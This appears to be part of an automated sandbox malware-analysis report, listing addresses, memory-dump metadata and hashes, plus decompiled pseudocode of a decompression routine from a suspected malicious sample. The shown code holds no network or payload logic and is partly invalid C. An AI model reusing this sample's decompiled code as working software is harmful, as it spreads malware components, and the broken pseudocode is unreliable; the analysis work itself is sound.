                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00407489
                    0x00407489
                    0x00000000
                    0x00407489
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00407447
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c7
                    0x004074c7
                    0x004074cb
                    0x0040752b
                    0x0040752e
                    0x00407533
                    0x00407534
                    0x00407536
                    0x00407538
                    0x0040753b
                    0x00407447
                    0x00407447
                    0x00000000
                    0x0040744d
                    0x00407447
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074eb
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x0040751d
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00407447
                    0x004073ce
                    0x004073cb
                    0x00000000
                    0x00407120

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                    • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                    • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                    • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
